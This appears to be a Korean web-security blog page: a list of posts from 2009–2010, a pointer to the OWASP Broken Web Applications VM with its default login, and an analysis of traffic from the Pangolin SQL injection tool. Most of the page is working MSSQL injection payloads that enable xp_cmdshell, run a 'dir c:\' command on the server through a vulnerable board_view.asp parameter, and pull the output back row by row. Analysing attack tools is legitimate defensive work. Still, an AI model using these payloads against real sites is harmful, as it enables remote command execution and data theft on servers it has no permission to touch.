'어플리케이션/웹보안'에 해당되는 글 38건
- 2010.03.11 웹 어플리케이션 개발보안 가이드 2010
- 2010.02.03 OWASP Broken Web Applications Project
- 2010.01.06 2007 전자정부 웹취약점 대응지침
- 2010.01.06 Google Chrome MetaCharacter URI Obfuscation Vulnerability
- 2009.12.23 웹 보안 툴박스(http://toolbox.krcert.or.kr/)
- 2009.12.20 웹사이트 개발운영을 위한 개인정보보호가이드
- 2009.11.17 OWASP TOP 10(2010)
- 2009.11.04 mod_security 우회 기법
- 2009.09.20 Malzilla
- 2009.07.23 Pangolin - XP(확장 프로시져) 활성화 명령어 분석
링크 : http://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project#tab=Project_Details
관련 이미지 다운로드 : http://code.google.com/p/owaspbwa/wiki/Downloads
id : root
pw : owaspbwa
exec sp_configure 'Ad Hoc Distributed Queries',1;
exec sp_configure 'show advanced options',1;
exec sp_configure xp_cmdshell,1;
/board_view.asp?num=50 ;create table [pangolin_test_table]([resulttxt] nvarchar(4000) null);--
/board_view.asp?num=50 ;declare @z nvarchar(4000) set @z=0xdir c:\ insert into [pangolin_test_table](resulttxt) exec master.dbo.xp_cmdshell @z;alter table
[pangolin_test_table] add id int not null identity (1,1)--
/board_view.asp?num=50 and (select cast(count(1) as varchar(8000))+char(94) from [web]..[pangolin_test_table])>0--
/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end from [pangolin_test_table] order by [id])
/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end from [pangolin_test_table] where id not in
(select top 2 id from [pangolin_test_table] order by [id]) )>0--
/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end from [pangolin_test_table] where id not in
(select top 3 id from [pangolin_test_table] order by [id]) )>0--
/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end from [pangolin_test_table] where id not in
(select top 4 id from [pangolin_test_table] order by [id]) )>0--
/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end from [pangolin_test_table] where id not in
(select top 5 id from [pangolin_test_table] order by [id]) )>0--